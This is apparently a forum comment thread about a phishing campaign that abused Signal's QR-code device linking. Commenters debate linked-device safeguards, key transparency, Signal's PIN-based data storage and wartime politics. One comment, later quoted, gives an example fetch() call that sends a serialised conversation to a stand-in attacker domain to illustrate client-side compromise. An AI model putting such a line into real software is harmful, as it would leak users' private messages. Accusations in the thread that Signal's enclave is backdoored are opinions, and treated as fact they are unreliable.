I'm only surprised it took this long for an in-the-wild attack to appear in open literature.
It certainly doesn't help that Signal themselves have discounted this attack (quoting from the IACR ePrint paper):
"We disclosed our findings to the Signal organization on October 20, 2020, and received an answer on October 28, 2020. In summary, they state that they do not treat a compromise of long-term secrets as part of their adversarial model"
Thus, mounting this attack would seem to require physical access to one of the victims' devices (or some other backdoor), in which case you've already lost.
Correct me if I'm wrong, but that doesn't seem particularly dangerous to me? As always, security of your physical hardware (and not falling for phishing attacks) is paramount.
That leaves the only remedy for a Signal account that has accepted a link to a 'bad device' being to burn the whole account (maybe rotating safety numbers/keys would be sufficient; I am uncertain there). If you can prove the malicious link was only a link, then yeah, the attack I described is incomplete, but the general issues with linked devices, and the remedies described, are the important bits, I think.
You can always see how many devices a user has: each device has a unique integer ID, so if I want to send you a message, I generate a new encrypted version for each device. If the UI does not show your devices properly, then that is an oversight for sure, but I don't think that's the case anymore.
Either way, you'd have to trust that the Signal server is honest and tells you about all your devices. To avoid that, you need proofs that every Signal user has the same view of your account (keys), which is why key transparency is such an important feature.
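To make "same view" concrete: key transparency designs typically publish a signed Merkle root over all accounts, and clients check inclusion proofs against it. A minimal sketch (illustrative names, not Signal's actual API):

    import { createHash } from "node:crypto";

    const sha256 = (data: Buffer): Buffer =>
      createHash("sha256").update(data).digest();

    // Walk from a leaf (a hash of the user's current key bundle) up to
    // the published log root, combining with server-supplied siblings.
    function verifyInclusion(
      leaf: Buffer,
      siblings: { hash: Buffer; left: boolean }[],
      expectedRoot: Buffer,
    ): boolean {
      let node = sha256(leaf);
      for (const s of siblings) {
        node = s.left
          ? sha256(Buffer.concat([s.hash, node]))
          : sha256(Buffer.concat([node, s.hash]));
      }
      return node.equals(expectedRoot);
    }

Since every client checks proofs against the same signed root, a server that shows different key sets to different users can be caught.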
Those keys are backed by the Keystore on Android and similar systems on Windows/Linux; I'd assume the same for macOS/iOS (but I don't know the details). So it's not as simple as just having access to your laptop; they'd need at least root.
Phishing is always tricky, and sadly probably impossible to counter; each one of us would be susceptible at the wrong moment.
This isn't intractable either. You could imagine various protocols where having the IK is insufficient for receiving new messages going forward or impersonating the sender. A simple one would be for each new device to establish a new key that the server recognizes as pertaining to that device; messages sent to a device would be encrypted with its per-device key, and outbound messages would be required to be similarly encrypted. There are probably better schemes than this naive approach.
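A minimal sketch of that naive scheme (illustrative only; in the real protocol each device runs its own Double Ratchet session rather than holding a raw symmetric key):

    import { randomBytes, createCipheriv } from "node:crypto";

    // One symmetric key per linked device; a device the user never
    // enrolled has no key and can decrypt nothing, IK or not.
    const deviceKeys = new Map<number, Buffer>([
      [1, randomBytes(32)], // phone
      [2, randomBytes(32)], // desktop
    ]);

    function encryptForAllDevices(plaintext: string) {
      return [...deviceKeys].map(([deviceId, key]) => {
        const iv = randomBytes(12);
        const cipher = createCipheriv("aes-256-gcm", key, iv);
        const ciphertext = Buffer.concat([
          cipher.update(plaintext, "utf8"),
          cipher.final(),
        ]);
        return { deviceId, iv, ciphertext, tag: cipher.getAuthTag() };
      });
    }

The point is just that holding the long-term IK alone gets an attacker none of these per-device keys.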
The Signal server does not fan messages out to your devices; the list of devices someone has (including your own) can and has to be queried in order to communicate with them, since each device establishes unique keys signed by that IK. So it isn't as bad as having invisible devices you'd never be aware of. That of course relies on you being able to ensure the server is honest and consistent, but that is work they already have in progress.
I think most of the issue here doesn't lie in the protocol design but in (1) how you "detect" the failure scenarios (like here: if your phone is informed a new device was added without you pressing the Link button, you can assume something's phishy), (2) how you properly warn people when something bad happens, and (3) how you inform users such that you both have a similar mental model. You also have to achieve these things without overwhelming them.
Background services on devices have been a thing for a while too. Install an app (granting all the permissions it asks for) and bam: a self-restarting daemon service tracking your location, search history, photos, contacts, notes, email, etc.
This was classic phishing, though.
Outside of lab settings, the only ways to do that are:
- (1) you get root access to the user's device
- (2) you compromise a recent chat backup
The campaign Google found is akin to phishing, so it's not as problematic on a technical level. How you warn someone they might be doing something dangerous is an entire can of worms in usable security... but it's going to become even more relevant for Signal once adding a new linked device also copies your message history (and the last 45 days of attachments).
The attack presented by Google is just classical phishing. In this case, if linked devices are disabled or don't exist, sure, you're safe. But if the underlying attack has a different premise (for example, "You need to update to this Signal apk here"), it could still work.
The last bit adds an interesting facet: even if you open source the client and manage to make it verifiably buildable by the user, you still need to distribute it on the iOS App Store. Anything can happen in the publishing process. I use iOS as the example because it's particularly tricky to load your own build of an application.
And then if you did that, you'd still need to do it all on the other side of the chat too, assuming it's a multi-party chat.
You can have every cute protocol known to man, the best encryption algorithms on the wire, etc., but at the end of the day it's all trust.
I mention this because these days I worry more that using something like signal actually makes you a target for snooping under the false guise that you are in a totally secure environment. If I were a government agency with intent to snoop I'd focus my resources on Signal users, they have the most to hide.
Sometimes it all feels pointless (besides encrypted storage).
I also feel weird that the bulk of the discussion is on the hypothetical validity of a security protocol, usually focused on the maths, when all of that can be subverted with a fetch("https://malevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?
This makes that entire goal moot; eliminating trust thus seems impossible, you're just shifting around the things you're willing to trust, or hide them behind an abstraction.
I think what will become more important is having enough mechanisms to categorically prove whether an entity you trust to a certain extent is acting maliciously, and to hold them accountable. If economic incentives are not enough to trust a "big guy", what remains is to give all the "little guys" a good enough loudspeaker to voice distrust.
A few examples:
- certificate transparency logs, so your traffic is not MitM'ed
- reproducible builds, so the binary you get matches the public open source code you expect it to (regardless of its quality; see the sketch below)
- key transparency, so when you chat with someone on WhatsApp/Signal/iMessage you actually get the public keys you expect and not the NSA's
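The reproducible-builds item boils down to a digest comparison; a sketch with hypothetical file paths:

    import { createHash } from "node:crypto";
    import { readFileSync } from "node:fs";

    // Build the published source yourself, then compare digests with
    // the binary you were actually shipped.
    const digest = (path: string): string =>
      createHash("sha256").update(readFileSync(path)).digest("hex");

    const shipped = digest("./Signal-shipped.apk"); // what the store gave you
    const rebuilt = digest("./Signal-rebuilt.apk"); // what you built from source
    console.log(shipped === rebuilt ? "build matches source" : "MISMATCH");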
I agree. Perhaps it's why I find discussions like nonce lengths and randomness sources almost insane (in the sense of willfully missing the forest for the trees). Intelligence agencies have managed to penetrate the most secretive and powerful organizations known to man. Why would one think Signal's supply chain is impervious? I'd assume the opposite.
> If you're building a chip to generate prime numbers, I surely hope you know how to select randomness or write constant-time, branch-free algorithms, just like an engineer designing elevators had better know what the tensile strength of the cable should be. In either case, it's mumbo jumbo to me, and I just need to get on with my day.
Part of what muddies the water is our collective inability to separate the two contexts, or empower tech communicators to do it. If we keep making new tech akin to esoteric magic, no one will board the elevator.
There's a part of me that wonders whether some of the more hardcore desiderata like perfect forward secrecy are, in practical terms, incompatible with what users want from messaging. What users want is "I can see all of my own messages whenever I want to and no one else can ever see any of them." This is very hard to achieve. There is a fundamental tension between "security" and things like password resets or "lost my phone" recovery.
I think if people fully understood the full range of possible outcomes, a fair number wouldn't actually want the strongest E2EE protection. Rather, what they want are promises on a different plane, such as ironclad legal guarantees (an extreme example being something like "if someone else looks at my messages they will go to jail for life"). People who want the highest level of technical security may have different priorities, but designing the systems for those priorities risks a backlash from users who aren't willing to accept those tradeoffs.
Building anything that's meant to be properly secure - secure enough that you worry about the distinction between E2E encryption and client-server encryption - on top of iOS and Google Play Services is IMO pretty pointless yes. People who care about their security to that extent will put in the effort to use something other than an iPhone. (The way that Signal promoters call people who use cryptosystems they don't like LARPers is classic projection; there's no real threat model for which Signal actually makes sense, except maybe if you work for the US government).
> I also feel weird that the bulk of the discussion is on the hypothetical validity of a security protocol, usually focused on the maths, when all of that can be subverted with a fetch("https://malevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?
There's definitely a streetlight effect where academic cryptography researchers focus on the mathematical algorithms. Nowadays the circle of what you can get funding to do security research on is a little wider (toy models of the end to end messaging protocol, essentially) but still not enough to encompass the full human-to-human part that actually matters.
I think your comment in general, and this part in particular, forgets the state of telecommunications 10-15 years ago. Nothing was encrypted. Doing anything on public Wi-Fi was playing Russian roulette, and signals intelligence agencies were having the time of their lives.
The issues you are highlighting _are_ present, of course; they were just of a lower priority than network encryption.
Android has that, and it can confirm to a third party whether the phone is running, for example, a locked bootloader with a Google signature and a Google OS. It's technically possible to have a different chain of trust and get remote parties to accept a Google phone + LineageOS (as an example) as "original" software.
The last part is the app. You could in theory attest the signature on the app, which the OS has access to and could provide to the remote party if needed.
A fully transparent attested artifact, one that doesn't involve blind trust in an entity like Google, would use a ledger with hashes and binaries of the components being attested, instead of a root of trust based on signatures.
All of the above are technically possible, but not implemented today in a way that makes this feasible. I'm confident that with enough interest this will eventually be implemented.
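For illustration, the ledger idea might look something like this (purely hypothetical shapes and placeholder entries):

    // Instead of trusting a vendor signature chain, the verifier checks
    // the attested measurement against a public, append-only ledger of
    // known-good component hashes.
    type Attestation = { component: string; measurement: string };

    const ledger = new Set<string>([
      "bootloader:...", // placeholder entries; a real ledger would hold
      "os-image:...",   // full hashes plus pointers to source/binaries
    ]);

    const verify = (att: Attestation): boolean =>
      ledger.has(`${att.component}:${att.measurement}`);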
We probably agree that this is infeasible for the vast majority of people.
Luckily reproducible builds somewhat sidestep this in a more practical way.
With a little bit of hardware you could get a lot of assurance back: "Optical repeater inside the optocouplers of the data diode enforce direction of data transmission with the fundamental laws of physics."
But the OS might be compromised with a screen recorder or a keylogger. You'd need the full client, OS and hardware to be built by the end user. But then the client that they're sending to might be compromised... Or even that person might be compromised.
At the end of the day you have to put your trust somewhere, otherwise you can never communicate.
Anyone whose threat model includes well-resourced actors (like governments) should indeed be building their communications software from source in a trustworthy build environment. But then of course you still have to trust the hardware.
tl;dr: E2E prevents some types of attacks, and makes some others more expensive; but if a government is after you, you’re still toast.
This is sorta my point: lots of DC folks use Signal under the assumption they're protected from government snooping. Sometimes I feel like it could well have the opposite effect (via the selection bias of Signal users).
> [...] threat actors have resorted to crafting malicious QR codes that, when scanned, will link a victim's account to an actor-controlled Signal instance. If successful, future messages will be delivered synchronously to both the victim and the threat actor in real-time, [...]
https://www.bleepingcomputer.com/news/security/signal-will-l...
Would a malicious URL be able to activate this feature as part of the request?
It is more concerning if the toggle is on by default and then you carelessly press next (on this or some other kind of phish).
It raises questions about smartphones being standard equipment for soldiers, but they do give every soldier an effective, powerful computing and communication platform (one they already know how to use without additional training).
The question is how to secure them, including against the risk described in the parent. That seems like a high risk to me; I would expect someone is working on securing them well enough that even Russian intelligence doesn't have an effective exploit.
The solutions may apply well to civilian privacy too, if they ever become more widespread. It wouldn't be the worst idea to secure Ukrainian civilian phones against Russian attackers.
Encrypted milspec comms aren’t the standard in a massive war.
It's weird, but Discord, Signal, and some mapping apps on smartphones are how this war is being fought.
It is standard in any modern military that is actually prepared for war. It's not like encrypted digital radio is some kind of fancy tech, either - it's readily available to civilians.
Ukraine in particular started working on a wholesale switch to encrypted Motorola radios shortly after the war began in 2014, and by now it's standard equipment across their forces. Russia, OTOH, started the war without a good solution, with a patchwork of ad hoc solutions originating from enthusiasts in the units - e.g. https://en.wikipedia.org/wiki/Andrey_Morozov was a vocal proponent.
But smartphones are more than communications. You can also use them as artillery computers for firing solutions, for example. And while normally there would be a milspec solution for this purpose, those are usually designed with milspec artillery systems and munitions in mind, while both sides in this war are heavily reliant on stocks that are non-standard (to them) - Ukraine, obviously, with all the Western aid, but Russia also had to dig out a lot of old equipment that was not adequately handled. Apps are much easier to update for this purpose, so they're heavily used in practice (and, again, these are often grassroots developments, not something pushed top-down by brass).
I'm sure Russia's meat-wave tactics have more of a role. If you're sending your troops on suicide missions, including guys without weapons and even on crutches, you're not exactly keen on having them carry mobile phones to document the experience or even, heaven forbid, survive by surrendering.
Are you sure it's a meme, though? There is plenty of footage out there, documenting meat wave tactics in 4k. Have you been living under a rock?
> Again, if Ukrainians are being beaten by a guy on crutches (...)
What's your definition of "being beaten"? Three years into Russia's 3-day invasion of Ukraine and Ukraine started invading and occupying Russian territory. Is this your definition of being beaten?
And I think pretty much all published Ukrainian and Russian combat footage is vetted by their respective militaries (who would want to be court-martialed for Reddit karma?).
They just take different approaches to what, when, and where to release the footage.
I’d want to run military communications on a network my side controls
There's no particular need, IMO, to secure smartphones on the battlefield in any way beyond standard countermeasures, i.e. encrypt the storage and use a passcode unlock.
Which is a process and procedure issue, more than a security issue with the phones themselves (except insofar as it's really obvious there's a solid need for an OS for battlefield devices that strips all that stuff out by default).
https://www.cbc.ca/news/world/russia-troops-cellphone-ukrain...
Remember that Signal is designed for non-technical users. Many/most do not understand QR codes, links, linking, etc, and they do not think much about it. They take an immediate, instinctive guess and click on something - often to get it off the screen so they can go back to what they were doing.
Do you have reason to think there is not confirmation? Maybe Signal's documentation will tell you.
The reason is just that in the article it says:
> threat actors have resorted to crafting malicious QR codes that, when scanned, will link a victim's account to an actor-controlled Signal instance
That phrasing suggests to me that scanning the QR code, on its own, performs the linking. That may not be the case, but if it isn't, I'd say the wording is misleading or at least imprecise.
Not the person you replied to, but I just tried googling half a dozen different terms and got results that have nothing to do with Signal.
> Remember that Signal is designed for non-technical users.
That does not prevent them from putting up a warning message that says "You just scanned a code which will allow another device to read all future messages sent to you, and send messages from your identity. Are you sure you want to do that?", where the button says "link devices", not "yes" or "no".
I think the frustration here is that Signal petulantly and paternalistically refuses to allow you to fully sync to another device (and for years refused to even allow you to back up messages) because supposedly we can't be trusted with such a thing...but then they leave the QR code system so idiotically designed it's apparently trivial to phish people into linking their devices to malicious actors?
Why the fuck does scanning a QR code, without having first selected "link device", even open that dialog? Or why doesn't it require the PIN code they obsessively force us to re-enter all the time?
It's obviously ripe for abuse.
We admonish people for piping a remote document into their shell but a QR code that links devices with one click is OK?
As an experiment, I just linked a device to my Signal account. After clicking "Link new device" in Signal, and then scanning the QR code, a dialog popped up: "Link this device? This device will be able to see your groups and contacts, access your chats, and send messages in your name. [Cancel] [Link new device]"
If I scan the QR code with Google Lens instead, it reads and displays the sgnl://linkdevice... URL but does not launch (or offer to launch) Signal.
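For what it's worth, the guard people are asking for upthread is small; a sketch with hypothetical names, not Signal's actual code:

    // Only honor a linkdevice URI if the user explicitly started the
    // linking flow from settings, and even then ask for confirmation.
    let userStartedLinkFlow = false; // set true by the settings screen

    const confirmWithUser = (prompt: string): boolean => {
      console.log(prompt); // stand-in for a real dialog
      return false;        // default to "Cancel"
    };

    function onUri(uri: string): void {
      if (!uri.startsWith("sgnl://linkdevice")) return;
      if (!userStartedLinkFlow) {
        console.warn("Ignoring link request: flow was not started in-app");
        return;
      }
      if (confirmWithUser("This device will be able to read your chats " +
          "and send messages in your name. Link it?")) {
        // proceed with linking...
      }
    }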
Signal is doing its best to be a web scale company and also defend human rights. Individual dignity matters.
This is not a simple conversation.
But compromised by whom? Russian or US intelligence? I am really confused.
I just looked quickly at the Signal Foundation website and its board members, and I read things like:
> Maher is a term member of the Council on Foreign Relations, a World Economic Forum Young Global Leader, and a security fellow at the Truman National Security Project.
> She is an appointed member of the U.S. Department of State's Foreign Affairs Policy Board
> She received her Bachelor's degree in Middle Eastern and Islamic Studies in 2005 from New York University's College of Arts and Science, after studying at the Arabic Language Institute of the American University in Cairo, Egypt, and Institut français d'études arabes de Damas (L'IFEAD) in Damascus, Syria.
Those types of people sound like part of the intelligence world to me. What exactly are they doing on the board of Signal (an open source messaging app)?
> This is not a simple conversation.
I agree
I think the solution is to completely ignore any potential disinfo source, especially random people on social media (including HN). It's hard to do when that's where the social center is - you have to exclude yourself. Restrict yourself to legitimate, trusted voices.
If you have compromised a service, it would be in your interest to make it more popular (assuming you think you are the only one in possession of it).
If you cannot, you don't give up; you just go back to the drawing board (https://xkcd.com/538/). Maybe I don't need to break Signal if I can just rely on phishing or scare tactics to get what I want.
I didn't realize anyone still used that term with a straight face.
"MongoDB is web scale, you turn it on and it scales right up."
Showing a big snackbar when a new device is added is probably enough, especially if the app can detect there was no "action" on your phone that triggered it.
Key transparency, once rolled out, would help to ensure there is no lingering "bad" device around, but phishing will always be a problem.
Probably true...
A big... what?
Can you tell me what this new lingo is for someone who doesn't use the latest and shittiest marketing lingo?
It has existed since Android 6: https://developer.android.com/reference/com/google/android/m...
Informative banner that does not require user interaction to dismiss.
Is that what you call the words you don't understand?
EDIT: An analytics-based approach would probably be far more useful, for example popping up a confirmation if GeoIP shows a device is far removed from all the others, which for most people would be true unless they were traveling.
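A sketch of that idea (the 500 km threshold is a guess):

    // Flag a linking attempt whose GeoIP position is far from every
    // known device; haversine great-circle distance in km.
    type Point = { lat: number; lon: number };

    function haversineKm(a: Point, b: Point): number {
      const rad = (d: number) => (d * Math.PI) / 180;
      const dLat = rad(b.lat - a.lat);
      const dLon = rad(b.lon - a.lon);
      const h = Math.sin(dLat / 2) ** 2 +
        Math.cos(rad(a.lat)) * Math.cos(rad(b.lat)) * Math.sin(dLon / 2) ** 2;
      return 2 * 6371 * Math.asin(Math.sqrt(h));
    }

    // Traveling users would just need one extra confirmation step.
    const suspicious = (candidate: Point, known: Point[]): boolean =>
      known.every((d) => haversineKm(candidate, d) > 500);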
Never trust a country at war—any side. Party A blames B, Party B blames A, but both have their own agenda.
The WHOIS is usually fake, made-up data, so I don't know why you are using it to claim the domain is registered in Ukraine. Russia is also known to use stolen credentials, SIM cards, etc. from its neighbouring countries, including Ukraine, for things like this.
Lots of Russian state actors have no problems working from within Ukraine, alas. Add to this purely chaotic criminal actors who will go with the highest bidder, territories temporarily controlled by Russians that have people shuttle to Ukraine and back daily, and it becomes complicated very quickly.
The issue isn't just attribution but also affiliation. When similar attacks come from Ukraine targeting Russia, Google stays quiet. I understand that Russia invaded Ukraine, not the other way around, but given the complexity of the conflict, aligning with one side in cyber warfare reporting is a questionable move. At the end of the day, attacks will come from both sides - it's a war, after all.
Edit: when I say 'questionable move', I'm specifically referring to Google. It's unclear what they were trying to achieve with this article: is it a political statement, or just a marketing piece showcasing how good GTIG is? Or both?
Stop the tiresome FUD please. This war is surprisingly straightforward by the standards of the last century, it's literally out of some decades-old textbook. Let's not drag this discussion here again. If you have specific issues with Google's attribution here, please state them, HN is pretty aware that attribution can be shaky. My only gripe with the article is the clickbait title: nobody says that someone is "targeting e-mail" about e-mail phishing.
Ex: Viktor Yanukovych, prior to being ousted.
Missing from their recommendations: install NoScript: https://noscript.net/
Source: https://cloud.google.com/blog/topics/threat-intelligence/rus...
Ironic, coming from Google, as Android is THE only OS where using alphanumeric passwords is nearly impossible: it limits password length to an arbitrary 16 characters, preventing the use of passphrases.
It's mostly just interesting to me that they did away with the username entirely and they instead have users connect exclusively through shared secrets like they're Diffie and Hellman.
https://web.archive.org/web/20210126201848mp_/https://palant...
https://www.vice.com/en/article/pkyzek/signal-new-pin-featur...
I think we should all agree that outright lying to users on the very first line of their privacy policy page is totally unacceptable.
"Signal is designed to never collect or store any sensitive information."
I interpret this, I think reasonably, to not include encrypted information. For that matter, they collect (but probably don't store) encrypted messages. The question is: does PIN+SGX qualify as sufficiently encrypted? This line is a lie only if it does not.
Sorry I skimmed those articles, I don't want to read them in depth. But it sounds like they are again ultimately saying "PIN+SGX is not secure enough".
I disagree, since attacks and leaks which could compromise that data can happen and have happened. Signal was already found to be vulnerable to CacheOut. Even ignoring that, guessing or brute-forcing a PIN is all anyone would need to get a list of everyone a Signal user has been in contact with. Just having that data (and, worse, keeping it forever) is a risk that absolutely should be disclosed.
> I don't want to read them in depth. But it sounds like they are again ultimately saying "PIN+SGX is not secure enough".
That was my conclusion back when all this started. The glaring lie and omissions in their privacy policy were just salt in the wound, but, charitably, it might be a dead canary intended to help warn people away from the service. Similarly, dropping the popular feature of allowing unsecured SMS/MMS and introducing a crypto wallet nobody asked for might also have been done to discourage the app's use.
My point is only that the headline of your point was "they are lying about not storing sensitive information". That leaves out a very important part of your point. IMO it makes the claim seem sensationalized and starts you off on the wrong foot.
Why? Encrypted information is still sensitive information.
Or, if you want to be literal, you have to say that they're storing sensitive information even if it's encrypted. But by connotation that phrase implies that someone other than the user could conceivably have access to it. So for all any user could care, they might as well not be storing it. Do you mean that they should rephrase it so it's literally correct?
Or do you mean that it's actually bad for them to be collecting safely encrypted sensitive data? Because if so, you literally cannot accept any encrypted messenger because 3rd parties will always have access to it.
see https://web.archive.org/web/20210109010728/https://community...
https://www.vice.com/en/article/pkyzek/signal-new-pin-featur...
Note that the "solution" of disabling pins mentioned at the end of the article was later shown to not prevent the collection and storage of user data. It was just giving users a false sense of security. To this day there is no way to opt out of the data collection.
See https://community.signalusers.org/t/proper-secure-value-secu...
Then read the first line of their terms and privacy policy page which says: "Signal is designed to never collect or store any sensitive information." (https://signal.org/legal/)
Signal loves to brag about the times when the government came to them asking for information only to get turned away because Signal never collected any data in the first place. They still brag about it. It hasn't actually been true for years though. Now they're collecting the exact info the government was asking for and they're protecting that data with a not-very-secure/likely backdoored enclave on the server side, and (even worse) a pin on the client side.
“Since a recent version of Signal data of all Signal users is uploaded to Signal’s servers. This includes your profile name and photo, and a list of all your Signal-contacts.”
They then link to a Signal blog (2019) explaining technical measures they were testing to provide verifiably tamperproof remote storage.
https://signal.org/blog/secure-value-recovery/
I'm not equipped to assess the cryptographic integrity of their claims, but 1) it sounds like you're saying they deployed this technology at scale, and 2) do you have a basis to suggest it's "not-very-secure or likely backdoored", given their apparently thoughtful and transparent engineering to ensure otherwise?
The problems with the security of Signal's new data collection scheme were talked about at the time:
https://web.archive.org/web/20210126201848mp_/https://palant...
https://www.vice.com/en/article/pkyzek/signal-new-pin-featur...
You'll have to decide for yourself how secure pins and enclaves are, but even if you thought they were able to provide near-perfect security I would argue that outright lying to highly vulnerable users by saying "Signal is designed to never collect or store any sensitive information." on line one of their privacy policy page is inexcusable and not something you should tolerate in an application that depends on trust.
The forum post explains this:
> This data is encrypted by a PIN only the user can know; however, users are allowed to create their own very short numeric PIN (4 digits). By itself this does not protect data from being decrypted by brute force. The fact that a slow decryption algorithm must be used is not enough to mitigate this concern; the algorithm is not slow enough to make brute forcing really difficult. The promise is that Signal keeps the data secured on their servers within a secure enclave. This allows anyone to verify that no data is taken out of the server, not even by the Signal developers themselves, not even if they get a subpoena. At least that is the idea.
> It is also not clear if a subpoena can force Signal to quietly hand over information which was meant to stay within this secure enclave.
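To put rough numbers on the brute-force concern in that quote, here's a back-of-the-envelope sketch assuming, generously, a KDF tuned to one second per guess on the attacker's hardware; that cost is my assumption, not Signal's published figure:

    // Worst-case time to exhaust an all-numeric PIN space.
    const secondsPerGuess = 1; // assumed KDF cost per attempt
    for (const digits of [4, 6, 8]) {
      const hours = (10 ** digits * secondsPerGuess) / 3600;
      console.log(`${digits}-digit PIN: <= ${hours.toFixed(1)} hours`);
    }
    // ~2.8 hours for 4 digits, ~11.6 days for 6: without the enclave's
    // guess limiting, the KDF alone buys very little.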
That should be very concerning for activists/journalists who use Signal to maintain privacy from their government. Subpoena + gag order means the data is in the hands of the government, presuming Signal wants to keep offering its services to the population of the country in question.
In my opinion Briar is where it's at, but because there's no data collection, it's a pain to do a handshake or manage contacts.
After Moxie's statement at the time, I kind of ditched everything regarding Signal's ecosystem. I understand the business perspective of it, but it's kind of pointless to call this open source when it's illegal to press the Fork button on GitHub, you know.
One of the few articles that talked about it at the time: https://www.vice.com/en/article/pkyzek/signal-new-pin-featur...
One of the many reddit posts by confused users who misunderstood the very unclear communications by Signal: https://old.reddit.com/r/signal/comments/htmzrr/psa_disablin...
Couple this with Signal being the preferred messaging app for Five Eyes countries, as advised by their three-letter agencies, and, well, if you think those agencies are going to be advising a comms platform they can't track, trace, or read, you obviously don't understand what they do.
https://signal.org/blog/keeping-spam-off-signal/
They point out that the protocol's end-to-end cryptographic guarantees are still open and in place, and as verifiable as ever. As far as I can tell, they claim that they combine voluntary user spam reports with metadata signals of some sort:
> When a user clicks “Report Spam and Block”, their device sends only the phone number that initiated the conversation and a one-time anonymous message ID to the server. When accounts are repeatedly reported as spam or network traffic appears to be automated, we can issue “proof of humanity” checks to suspicious senders so they can’t send more messages until they’ve completed a challenge. For example, if you exceed a configured server-side threshold for making requests to Signal, you may need to complete a CAPTCHA within the Signal application before making more requests. This approach slows down spammers while allowing regular messages to continue to flow.
Does that seem unreasonable? Am I missing places where people have identified flaws in the protocol?
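As far as I can tell, the quoted mechanism amounts to something like this server-side; the threshold and the two outcomes are illustrative, not Signal's real values:

    // Count requests per sender within a window; heavy senders must
    // pass a proof-of-humanity challenge before more messages flow.
    const counts = new Map<string, number>();
    const THRESHOLD = 100; // hypothetical per-window limit

    function onSendRequest(senderId: string): "deliver" | "challenge" {
      const n = (counts.get(senderId) ?? 0) + 1;
      counts.set(senderId, n);
      return n > THRESHOLD ? "challenge" : "deliver";
    }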
Then read the first line of their terms and privacy policy page which says: "Signal is designed to never collect or store any sensitive information." (https://signal.org/legal/)
https://www.microsoft.com/en-us/security/blog/2025/02/13/sto...
https://web.archive.org/web/20250219202428/https://cloud.goo...
Reading this for the first time: what is a "re-invasion"? Do they mean the described cyber attack as a second invasion, aka "re-invasion"?
The re-invasion of Ukraine in February 2022; the original invasion was in 2014.
If, somehow, the victim's phone provider can be compromised or coerced into cooperating, the government actor can intercept the text message Signal and others use for verification and set up the victim's account on a new device.
It's very easily done if the victim is located in an authoritarian country like Russia or Iran; they can simply force the local phone provider to cooperate.
Yes, but if they only control the phone number, they will register a new account (with different cryptographic keys) for you, which is why everyone previously chatting with you will get that "Your safety number with Bob has changed" message.
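That warning works because the safety number is derived from both parties' identity keys, so a forced re-registration changes it for every contact. A simplified stand-in for the real fingerprint construction:

    import { createHash } from "node:crypto";

    // Replacing either identity key changes the number every contact
    // sees, which is what makes a forced re-registration visible.
    function safetyNumber(mine: Buffer, theirs: Buffer): string {
      const [a, b] = [mine, theirs].sort(Buffer.compare);
      return createHash("sha512")
        .update(Buffer.concat([a, b]))
        .digest("hex")
        .slice(0, 60); // display a short, comparable prefix
    }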
Oh, how Americans make fun of the CCP, yet watching all the tech bros bend the knee was embarrassing.
So what?
Totally agreed that it's out of bounds to label all Trump voters as rednecks & white nationalists. But I'm not sure where you're getting that: read upthread. No one said anything like that. Just "Russia-aligned state actors", which is also pretty silly.
But in a way, it's worse than all that. If his supporters were actually all rednecks & white nationalists (or Russia-aligned state actors), at least we could say, "well, the country is actually full of shitty, uneducated, racist people, so I guess this actually is the will of the people". But right, that's not the case. Instead, Trump and the GOP have lied and manipulated to the point they've managed to dupe a much more diverse group of people into believing in Trump. Or, at the very least, into believing that the system needs to burn in order for it to be remade in a way that will serve these people's interests.
All this is a crock, of course, and there are already quite a few surprised and upset Trump voters who have experienced an interruption or loss of some government service that they depend on. So OK, let's expand the list. Sure, there are rednecks & white nationalists. But there are also just regular ol' idiots who fell for Trump's nonsense. And actively awful people who are fine with a lot of others getting hurt, just to spite the current establishment.
Complaining about the comment isn't witty, doesn't contain useful information, and doesn't promote discussion either.
I would recommend being the change you want to see in the world (or avoid political threads).
The USA pushed Ukraine to give up its nukes, offering security assurances instead. Then, during the full-scale war, it donated just 30 old tanks. And now Trump is talking with Putin behind Ukraine's back about how they should surrender.
Unfortunately, the USA is not a superpower anymore, and its word means nothing.
I wish this were true, but while Mr. Trump has dedicated himself to ripping up the world order, the US still has far too many nukes not to be treated as a substantial power.
If the US isn't a superpower, I'm not sure there are any superpowers left.
This one is fake, even if plausible: https://www.der-postillon.com/2025/02/ueberfall-auf-polen.ht... - Der Postillon is Germany's equivalent of the US's The Onion.
They also try to get the actual SQL database files from Windows and Android devices.
The only people who think it is bad are people who have a different opinion and feel attacked for whatever reason. I find it telling when people accuse others of virtue signaling, because it is almost always someone who is jealous or insecure attacking said signaler.
Driving an economically efficient car -- choosing any sort of car -- has enormous consequences on one's life, for example. Choosing to buy a particular car isn't a decision made lightly. But Prius drivers back in the day were accused of virtue signaling, as though the Prius were equivalent to a temporary tattoo.
In fact, speaking of temporary tattoos, simply having a bumper sticker advocating for animal rights, say, belief in anthropogenic climate change, or peace in the Middle East will expose one to regular displays of hostility and aggression, so it isn't a cheap signal.
In other words, in my experience your observation is spot on.
Virtue signaling means sending deliberate signals about your virtues, whether you "walk the walk" or not. People are often critiqued for going to uncomfortable lengths to signal their virtues, but something as simple as a "meat is murder" shirt or a MAGA hat is also virtue signaling.
And, in doing so, achieve the security posture of the worse of the two apps!
If you change and abandon your principles, were they really principles in the first place?
If there is a communications channel by which they can give you their phone number, you can use that same channel to discuss what messenger to use.
If you don't need to? You tell them to get Signal.
- install [the thing]
- start it, show how it works
- search for yourself, start a convo, exchange messages
- add them to the group
IME the friction comes from having to do the first step, because it's really an annoyance no one cares about, so if you take it on yourself and do it, they'll like that.
I'd tell them that - just download it and you'll be texting me in a minute, and now nobody is tracking everyone you talk to.
On Signal, unless there is some bug or outright fraud, AFAIK they cannot; that is one of their fundamental goals, and they did a lot of work to develop communication technology that works without revealing that metadata.
(Of course, if someone gets access to your phone, then they know who you are talking to.)
I have so many WhatsApp group chats (here in Australia) that are critical for me these days, and that I don't control, and that have way too many people, and way too diverse a range of people, for me to have any hope whatsoever of migrating them all to Signal. School parents group chats (one for each class that my kids are in). Strata (aka Home Owners Association) committee group chat. Scouts group chat. Various friends groups chats. Boycotting WhatsApp is not an option for me, it would literally make me unable to function in a number of my day-to-day responsibilities.
There being a killer feature that WhatsApp users are missing out on won't convince everyone, but it sure makes me feel less like a nerd when encouraging the switch to Signal.
I find it quite funny that such an obvious feature likely hasn't been added to WhatsApp yet because Meta thinks Instagram is for stories. That's pure speculation on my part, though.
[0] https://en.wikipedia.org/wiki/Signal_Protocol#:~:text=Severa...
Look at what data they can provide to governments when compelled by law: https://signal.org/bigbrother/
It seems to be but there is more to it than that.
What some people care about is not giving all their private conversations to masculine-energy Zuck, but don't expect any major wins.
Read a couple books. Privacy is a precondition to democracy.
"Privacy is a precondition to democracy"
